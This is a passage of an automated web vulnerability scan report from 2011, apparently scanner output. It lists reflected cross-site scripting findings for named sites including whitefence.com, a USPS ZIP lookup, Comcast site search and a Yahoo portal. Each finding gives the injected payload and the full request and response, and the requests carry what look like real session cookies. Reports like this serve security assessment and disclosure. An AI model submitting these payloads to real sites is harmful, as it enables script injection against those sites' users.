Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:01 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.service-tips2775b--><img src=a onerror=alert(1)>67292b8abf7 div#body div.description {
background: url(/objects/images/catBacks/980/service-tips2775b-->
...[SNIP]...

2.115. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45eaa"><img%20src%3da%20onerror%3dalert(1)>353edce96bc was submitted in the REST URL parameter 2. This input was echoed as 45eaa"><img src=a onerror=alert(1)>353edce96bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/service-tips45eaa"><img%20src%3da%20onerror%3dalert(1)>353edce96bc/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:59:51 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view service-tips45eaa"><img src=a onerror=alert(1)>353edce96bc">
...[SNIP]...

2.116. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfd67"%3b5b4986bfa6d was submitted in the REST URL parameter 2. This input was echoed as cfd67";5b4986bfa6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/television-servicecfd67"%3b5b4986bfa6d/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:36 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Television-servicecfd67";5b4986bfa6d";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.117. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7b890--><img%20src%3da%20onerror%3dalert(1)>42ef7191050 was submitted in the REST URL parameter 2. This input was echoed as 7b890--><img src=a onerror=alert(1)>42ef7191050 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/television-service7b890--><img%20src%3da%20onerror%3dalert(1)>42ef7191050/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:45 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.television-service7b890--><img src=a onerror=alert(1)>42ef7191050 div#body div.description {
background: url(/objects/images/catBacks/980/television-service7b890-->
...[SNIP]...

2.118. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d74"><img%20src%3da%20onerror%3dalert(1)>6e8945171be was submitted in the REST URL parameter 2. This input was echoed as e3d74"><img src=a onerror=alert(1)>6e8945171be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/television-servicee3d74"><img%20src%3da%20onerror%3dalert(1)>6e8945171be/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:35 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view television-servicee3d74"><img src=a onerror=alert(1)>6e8945171be">
...[SNIP]...

2.119. http://yp.frontierpages.com/results.aspx [term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yp.frontierpages.com
Path:   /results.aspx

Issue detail

The value of the term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b57"style%3d"x%3aexpression(alert(1))"d9518141ec5 was submitted in the term parameter. This input was echoed as d5b57"style="x:expression(alert(1))"d9518141ec5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=d5b57"style%3d"x%3aexpression(alert(1))"d9518141ec5&city=Dallas&state=TX&zip= HTTP/1.1
Host: yp.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://www.frontierpages.com/region.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cznpages%3D%2526pid%253Dfrontierpages.com/region.asp%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BreturnBusinessSearch%252528%252529%25253B%25257D%2526oidt%253D2%2526ot%253DIMG

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:52:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: userid=e65ce03b-e5b2-4548-b8bf-667efcdf3dc3; expires=Thu, 06-Sep-2012 12:52:29 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17616


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<link href="
...[SNIP]...
<a href = "results.aspx?PageNumber=1&ListingID=&term=d5b57"style="x:expression(alert(1))"d9518141ec5&Address=&city=Dallas&State=TX&zip=&PageSize=25&Radius=50&ecs=true&sort=alpha&Heading=d5b57"style="x:expression(alert(1))"d9518141ec5&listingCount=0">
...[SNIP]...

2.120. http://zip4.usps.com/zip4/zcl_1_results.jsp [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://zip4.usps.com
Path:   /zip4/zcl_1_results.jsp

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6b649><script>alert(1)</script>6471dcc488fb924b6 was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /zip4/zcl_1_results.jsp?visited=1&pagenumber=0&city=BARRE&state=VT6b649><script>alert(1)</script>6471dcc488fb924b6&submit.x=0&submit.y=0&submit=Find+ZIP+Code HTTP/1.1
Host: zip4.usps.com
Proxy-Connection: keep-alive
Referer: http://zip4.usps.com/zip4/citytown.jsp
Cache-Control: max-age=0
Origin: http://zip4.usps.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331562506:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html;charset=ISO-8859-1
Cache-Control:
Content-Length: 25869
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:53:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en">
<HEAD>
<title>USPS - ZIP Code Lookup</title>
<met
...[SNIP]...
<input tabindex="2" id="state" style="width:38px;" type="text" maxlength="2" name="state" value=VT6B649><SCRIPT>ALERT(1)</SCRIPT>6471DCC488FB924B6 onKeyPress="return validate_for_characters(this, event)"/>
...[SNIP]...

2.121. http://sitesearch.comcast.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b36d</script><script>alert(1)</script>cf1b4e5a49c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}
Referer: http://www.google.com/search?hl=en&q=8b36d</script><script>alert(1)</script>cf1b4e5a49c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:23:27 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18554
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
ch - Version B";
s.events = "event11,event9";
s.eVar41 = "xss";
s.eVar34 = "Comcast.com Search - Version B";
s.prop18 = "xss";
s.prop19 = "http://www.google.com/search?hl=en&q=8b36d</script><script>alert(1)</script>cf1b4e5a49c";
s.pageName = "Search Results - Page 1";
s.eVar31 = s.pageName;
//s.pageName="";

switch ('com') {
case "help":
s.eVar42 = "help support";
brea
...[SNIP]...

2.122. http://www.whitefence.com/category/high-speed-internet/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490cf"><script>alert(1)</script>d506bb2c219 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=490cf"><script>alert(1)</script>d506bb2c219
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:30 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=490cf"><script>alert(1)</script>d506bb2c219" />
...[SNIP]...

2.123. http://www.whitefence.com/category/home-phone/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48394"><script>alert(1)</script>f4c68eaa46d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=48394"><script>alert(1)</script>f4c68eaa46d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:24 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=48394"><script>alert(1)</script>f4c68eaa46d" />
...[SNIP]...

2.124. http://www.whitefence.com/category/television-service/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5747"><script>alert(1)</script>f6d5090bb1c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b5747"><script>alert(1)</script>f6d5090bb1c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:26 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=b5747"><script>alert(1)</script>f6d5090bb1c" />
...[SNIP]...

2.125. http://frontier.my.yahoo.com/ [B cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The value of the B cookie is copied into an HTML comment. The payload f96d6--><script>alert(1)</script>f1539a4397b was submitted in the B cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=iif96d6--><script>alert(1)</script>f1539a4397b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=5394529394e6612406d36d0.50699106&s=dVWcpe4RkVkibBSnhXjPDQ--; expires=Mon, 05-Sep-2011 12:29:52 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:52 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171901

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...
<!--
PERF pid[62619]|user[ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=iif96d6--><script>alert(1)</script>f1539a4397b]|t[1315312192]|uri[/]|_rid[QBJmTvV6_Nib9AAADHhqbg..]|PAGE[YES]|UPES[5.8]|UPESF[5.9]|AC_upes[6.4]|AC_contentdb[10.4]|AC_ups[8.3]|coketoday_perf[17.2]|AC_coketoday[24.5]|AC_yql[3.3]|AC_weather[0.4]|coke
...[SNIP]...

2.126. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24732"-alert(1)-"bc24b459e39 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

